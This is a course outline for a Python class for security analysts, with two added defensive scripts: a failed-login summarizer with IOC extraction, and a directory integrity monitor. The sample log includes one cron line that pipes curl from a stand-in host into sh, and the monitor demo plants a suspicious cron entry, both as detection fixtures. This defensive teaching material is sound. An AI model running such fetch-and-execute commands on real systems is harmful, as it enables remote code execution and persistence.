Python for Security Analysts and Professionals


Contact us for course information at info@velocityknowledge.com


Duration: 5-days Instructor-led

Course Description

This 5-day instructor-led course is designed to teach security analysts, cybersecurity professionals, and incident responders how to leverage Python to automate security tasks, analyze logs, extract indicators of compromise (IOCs), and interact with APIs and tools commonly used in the cybersecurity field. Through real-world examples and hands-on labs, participants will gain practical skills to build custom tools and streamline their security operations.

Prerequisites

  • Basic understanding of cybersecurity concepts (SIEM, log analysis, threat detection)
  • Familiarity with security tools (Wireshark, Splunk, VirusTotal, etc.)
  • Basic experience using the Linux command line
  • No prior Python experience is required, but general programming knowledge is helpful

Key Objectives

By the end of the course, participants will be able to:

  • Understand Python fundamentals relevant to cybersecurity use cases
  • Automate routine security operations and parsing of large log files
  • Analyze files, network traffic, and system processes using Python
  • Interact with APIs to gather threat intelligence
  • Build tools for malware analysis, IOC extraction, and incident response
  • Use Python to assist in vulnerability scanning and reporting

Course Takeaways

  • Solid foundation in Python programming from a security perspective
  • Hands-on experience building security tools and automations
  • Access to a toolkit of scripts and code templates for everyday tasks
  • Guidance on how to continue developing Python skills after the course
  • Certificate of completion

Section 1: Python Fundamentals for Security Workflows

Module 1: Python Basics Refresher

  • Syntax, variables, data types
  • Control structures (if, for, while)
  • Functions and modules
  • File input and output
  • Working with JSON and CSV data

Module 2: Working with Files and Logs

  • Reading and parsing log files (Apache, syslog, Windows Event Logs)
  • String operations and regular expressions
  • Error handling and script structuring

Hands-On Labs

  • Lab 1: Parse a system log file to extract failed login attempts
  • Lab 2: Build a basic log summarizer using Python
  • Lab 3: Extract IP addresses and URLs using regex
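The three labs above all come down to the same pattern: read a log line by line, match it against a regular expression with named groups, and aggregate what you pulled out. The script below is an added illustration of that pattern, not course material or the lab solution; it runs over a handful of constructed sshd and cron lines embedded in the file (the addresses and hostnames are documentation values, not real hosts), counts failed logins per source address, and separately extracts IPv4 addresses and URLs as indicators for further triage.

```python
"""Added example: failed-login summary and IOC extraction from syslog text."""
import re
from collections import Counter

# Constructed sample syslog lines (documentation addresses, not real hosts).
SAMPLE_LOG = """\
Mar 10 06:12:01 bastion sshd[2231]: Accepted publickey for deploy from 10.0.0.5 port 51022 ssh2
Mar 10 06:12:07 bastion sshd[2240]: Failed password for root from 203.0.113.45 port 40122 ssh2
Mar 10 06:12:09 bastion sshd[2240]: Failed password for root from 203.0.113.45 port 40122 ssh2
Mar 10 06:12:15 bastion sshd[2251]: Failed password for invalid user admin from 198.51.100.7 port 33210 ssh2
Mar 10 06:13:02 bastion sshd[2260]: Failed password for invalid user oracle from 203.0.113.45 port 40130 ssh2
Mar 10 06:14:30 bastion cron[2301]: (root) CMD (curl -s http://example.test/update.sh | sh)
"""

# Named groups make the extracted fields self-describing; "invalid user" is optional
# because sshd phrases unknown and known accounts differently.
FAILED_LOGIN_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port (?P<port>\d+)"
)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"\bhttps?://[^\s\"'<>)]+", re.IGNORECASE)


def parse_failed_logins(text):
    """Return (failed attempts per source IP, set of usernames tried per IP)."""
    attempts = Counter()
    users = {}
    for line in text.splitlines():
        m = FAILED_LOGIN_RE.search(line)
        if not m:
            continue  # accepted logins and non-sshd lines are ignored
        ip = m.group("ip")
        attempts[ip] += 1
        users.setdefault(ip, set()).add(m.group("user"))
    return attempts, users


def extract_iocs(text):
    """Unique IPv4 addresses and URLs, in first-seen order."""
    ips = list(dict.fromkeys(IPV4_RE.findall(text)))
    urls = list(dict.fromkeys(URL_RE.findall(text)))
    return {"ips": ips, "urls": urls}


def summarize(text, threshold=3):
    """Human-readable summary; sources at or above threshold are marked for review."""
    attempts, users = parse_failed_logins(text)
    rows = []
    for ip, n in attempts.most_common():
        flag = "  <-- review" if n >= threshold else ""
        rows.append(f"{ip:15} {n:3} failed logins, users={sorted(users[ip])}{flag}")
    return "\n".join(rows)


if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
    print(extract_iocs(SAMPLE_LOG))
```

Two details worth carrying into the labs: anchor the regex on the program name (`sshd[...]`) so that a "Failed password" string inside an unrelated message cannot be miscounted, and keep the raw IOC extraction separate from the per-source aggregation so each can be reused on other log formats.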

Section 2: Automating Security Operations

Module 3: OS Interaction and Automation

  • Using the os and subprocess modules
  • Running system commands and collecting outputs
  • Scheduling and scripting automation tasks

Module 4: File and Process Monitoring

  • Working with filesystems and directories
  • Basic process inspection and filtering
  • Simple change detection scripting

Hands-On Labs

  • Lab 4: Script to monitor changes in a sensitive directory
  • Lab 5: Automate execution of a local antivirus scan and log results
  • Lab 6: Use Python to detect suspicious processes based on criteria
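Lab 4 is essentially a file-integrity check: record a baseline of what is in a directory, then compare later snapshots against it. The script below is an added example of that technique, not course material or the lab solution. It hashes every regular file under a root, records mode and size alongside the digest, and reports files added, removed, or modified; the `demo()` function builds a constructed directory in a temporary location so the code runs without touching a real system.

```python
"""Added example: baseline a sensitive directory and report what changed."""
import hashlib
import os
import tempfile
from pathlib import Path


def file_sha256(path, chunk_size=65536):
    """Stream the file through SHA-256 so large files do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Map relative path -> (sha256, permission bits, size) for every regular file under root."""
    root = Path(root)
    snap = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            p = Path(dirpath) / name
            if p.is_symlink() or not p.is_file():
                continue  # symlinks are skipped so a link cannot drag in files outside root
            st = p.stat()
            snap[p.relative_to(root).as_posix()] = (file_sha256(p), st.st_mode & 0o777, st.st_size)
    return snap


def diff_snapshots(old, new):
    """Compare two snapshots; a change in content, permissions, or size counts as modified."""
    added = sorted(set(new) - set(old))
    removed = sorted(set(old) - set(new))
    modified = sorted(p for p in set(old) & set(new) if old[p] != new[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Build a constructed directory, baseline it, make four kinds of change, return the diff."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "ssh").mkdir()
        (root / "ssh" / "sshd_config").write_text("PermitRootLogin no\n")
        (root / "passwd").write_text("root:x:0:0:root:/root:/bin/bash\n")
        (root / "hosts").write_text("127.0.0.1 localhost\n")
        baseline = snapshot(root)

        (root / "ssh" / "sshd_config").write_text("PermitRootLogin yes\n")   # content modified
        (root / "hosts").unlink()                                             # removed
        (root / "cron.d").mkdir()
        (root / "cron.d" / "update").write_text("* * * * * root /tmp/x.sh\n")  # added
        os.chmod(root / "passwd", 0o600)                                       # permissions only
        return diff_snapshots(baseline, snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:9}", ", ".join(paths) or "-")
```

In a scheduled job the baseline would be written to disk (for example as JSON) and stored somewhere the monitored host cannot rewrite it; comparing permission bits as well as content is what lets the script catch a file that was made world-writable without its contents changing.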

Section 3: Network Analysis and Packet Inspection

Module 5: Network Programming with Python

  • Using socket to capture traffic and scan ports
  • Crafting packets with Scapy
  • Parsing and inspecting PCAP files

Module 6: Intrusion Detection Support

  • Building basic signature-based detection tools
  • Identifying anomalies in traffic
  • Correlating IPs and ports with threat intelligence

Hands-On Labs

  • Lab 7: Build a simple port scanner with socket
  • Lab 8: Parse a PCAP file to extract DNS and HTTP data
  • Lab 9: Use Scapy to detect ARP spoofing on a local network

Section 4: Threat Intelligence and Malware Analysis

Module 7: Working with Threat Intelligence APIs

  • Using requests to make API calls
  • Integrating with VirusTotal, AbuseIPDB, AlienVault OTX
  • Parsing and storing threat intelligence results

Module 8: IOC Extraction and Malware Indicators

  • Extracting file hashes, domains, IPs from suspicious files
  • Automating hash lookups and URL reputation checks
  • Basic static analysis of suspicious scripts or binaries

Hands-On Labs

  • Lab 10: Use VirusTotal API to enrich indicators
  • Lab 11: Build a tool to extract IOCs from phishing emails
  • Lab 12: Analyze a suspicious PowerShell script for malicious indicators

Section 5: Building Security Tools and Final Project

Module 9: Python for Vulnerability Scanning

  • Automating Nmap and Nikto with Python
  • Parsing XML and JSON outputs
  • Building custom reporting tools

Module 10: Putting It All Together

  • Organizing code into reusable modules
  • Logging, exception handling, and reporting
  • Final project briefing and walkthrough

Contact us to customize this course for your team or organization.
